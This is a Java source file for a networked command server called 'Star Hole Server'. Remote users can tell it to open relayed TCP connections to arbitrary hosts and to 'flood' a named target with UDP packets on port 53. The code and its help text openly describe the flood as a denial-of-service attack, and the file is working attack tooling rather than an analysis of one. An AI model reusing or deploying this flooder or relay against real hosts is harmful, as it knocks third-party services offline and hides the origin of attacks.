import java.net.*;
import java.io.*;


class DestinationHostReader extends Thread {

  private ClientThread parent;

  public DestinationHostReader(ClientThread parent) {
    this.parent = parent;
  }

  public void run() {
    try {
      while (!interrupted()) {
        int ch = parent.dest_in.read();
        if (ch == -1) break;
        parent.receivedCharFromDestinationHost(ch);
      }
    } catch (Exception e) { }
    // Wake up parent when error or connection close
    synchronized (parent)
    { parent.notify(); }
  }

}



class SourceHostReader extends Thread {

  private ClientThread parent;

  public SourceHostReader(ClientThread parent) {
    this.parent = parent;
  }

  public void run() {
    try {
      while (!interrupted()) {
        int ch = parent.in.read();
        if (ch == -1) break;
        parent.receivedCharFromSourceHost(ch);
      }
    } catch (Exception e) { }
    // Wake up parent when error or connection close
    synchronized (parent)
    { parent.notify(); }
  }

}



public class ClientThread extends Thread {

  protected Socket s, remote_s;
  protected BufferedReader in, dest_in;
  protected PrintWriter out, dest_out;
  protected boolean socket_error = false;


  public ClientThread(Socket s) {
    try {
      in      = new BufferedReader(new InputStreamReader(s.getInputStream()));
      out     = new PrintWriter(s.getOutputStream(),true);
    } catch (Exception e) { socket_error=true; }
    this.s=s;
  }


  // Send given text to the socket
  void sendText(String text) {
    if (!socket_error)
      try { out.print(text); out.flush(); }
      catch (Exception e) { socket_error=true; }
    if (out.checkError())
      socket_error=true;
  }


  // Send given line to the socket
  void sendLine(String line) {
    if (!socket_error)
      try { out.print(line+"\r\n"); out.flush(); }
      catch (Exception e) { socket_error=true; }
    if (out.checkError())
      socket_error=true;
  }


  // Read a line from the socket. Return "" if error occured
  String readLine() {
    String line = "";
    if (!socket_error)
      try { line = in.readLine().trim(); }
      catch (InterruptedIOException e)
        { sendLine("! Timeout. Connection closed."); socket_error=true; }
      catch (Exception e) { socket_error=true; }
    return line;
  }


  // Return if given string line begins with given word cmd
  // ignoring the first character of cmd
  boolean isItCommand(String line, String cmd) {
    try {
      if (line.charAt(0) != cmd.charAt(0))
        cmd = cmd.substring(1);
      return line.toLowerCase().startsWith(cmd);
    } catch (Exception e) { return false; }
  }


  // Return the parameters for the command cmd in the command line line
  String getCommandParameters(String line, String cmd) {
    try {
      return line.substring(cmd.length()).trim();
    } catch (Exception e) { return ""; }
  }


  // This is used by "open" command as event handler for received bytes from dest host
  protected void receivedCharFromDestinationHost(int ch) {
    out.write(ch); out.flush();
  }


  // This is used by "open" command as event handler for received bytes fro source host
  protected void receivedCharFromSourceHost(int ch) {
    dest_out.write(ch); dest_out.flush();
  }


  // Do open command - do connection to given server and work as proxy
  void doOpenCommand(String server) {
    try {
      int i;
      for (i=0; i<server.length(); i++)
        if ((server.charAt(i)==' ') || (server.charAt(i)==':'))
          break;
      int tcp_port=23;
      try {
        tcp_port = Integer.parseInt(server.substring(i+1).trim());
      } catch (Exception e) { }
      server = server.substring(0,i).trim();
      sendLine("+ Opening TCP connection to "+server+" on port "+tcp_port+"...");
      // Connecting to remote server on given port
      try {
        remote_s = new Socket(server,tcp_port);
      } catch (Exception e) {
        sendLine("! Can not connect to remote server");
        return;
      }
      sendLine("+");
      sendLine("+ ----------------------- Connected to remote server -----------------------");
      sendLine("+");
      dest_in = new BufferedReader(new InputStreamReader(remote_s.getInputStream()));
      dest_out = new PrintWriter(remote_s.getOutputStream(),true);
      SourceHostReader sr = new SourceHostReader(this); sr.start();
      DestinationHostReader dr = new DestinationHostReader(this); dr.start();
      // Wait for one of the threads to stop his work
      synchronized (this)
      { wait(); }
      // Stop the threads
      sr.interrupt();
      dr.interrupt();

      sendLine("!");
      sendLine("! --------------------------- Connection closed ----------------------------");
      sendLine("!");
    } catch (Exception e) {
      sendLine("! Invalid server or port");
      return;
    }

  }


  // Do flood command - flood given server (apply some Denial Of Service attacks)
  // Currently UDP flood is applied on port 53 (DNS)
  void doFloodCommand(String server) {

    int UDP_PACKET_SIZE = 256;
    int DEST_UDP_PORT   = 53;
    int DISPLAY_TIME    = 1 * 1000;  // 1 second refresh rate

    try {
      DatagramSocket ds = new DatagramSocket();
      InetAddress ia = null;
      try {
        ia = InetAddress.getByName(server);
      } catch (Exception e) {
        sendLine("! Can not connect to host");
        return;
      }
      DatagramPacket outgoing = new DatagramPacket(new byte[UDP_PACKET_SIZE], 1, ia, DEST_UDP_PORT);
      sendLine("+ Flooding "+server+" ... Press Ctrl-C to stop the flood");

      long last_time = System.currentTimeMillis()-DISPLAY_TIME;
      int packet_counter = 0;
      while (!socket_error) {
        if (System.currentTimeMillis()-last_time > DISPLAY_TIME) {
          sendText("+ "+packet_counter + " packets sent\n\r");
          if (in.ready())
            if (in.read() < 5)  // User send Ctrl-C or Ctrl-D. Abort flood
              break;
          last_time = System.currentTimeMillis();
        }
        ds.send(outgoing);  // Send new UDP packet
        packet_counter++;
      }
    } catch (Exception e) { }
    sendLine("\n\r! Flood aborted");
  }


  // Do help command - display help
  void doHelpCommand() {
    sendLine("+ Star Hole Server. (C) Svetlin Nakov, 2000. http://www.nakov.com");
    sendLine("+ Available commands are:");
    sendLine("+ open [server/ip] [port]  -  open TCP connection to remote server");
    sendLine("+ flood [server/ip]  -  flood given server (DoS attack)");
    sendLine("+ help  -  display help");
  }


  // Do communication with client
  void doClientCommunication() {
    sendLine("+ Welcome to Star Hole Server");
    String line;
    while (!socket_error) {
      line = readLine();
      if (isItCommand(line,"open"))
        doOpenCommand(getCommandParameters(line,"open"));
      else if (isItCommand(line,"flood"))
        doFloodCommand(getCommandParameters(line,"flood"));
      else if (isItCommand(line,"help"))
        doHelpCommand();
      else
        sendLine("! Invalid command. Type 'help' for more information");
    }
  }


  // This method is Thread.run() and is invoked by the main server thread
  public void run() {
    doClientCommunication();
    try { s.close(); } catch (IOException e) { }
    s = null;
  }

}

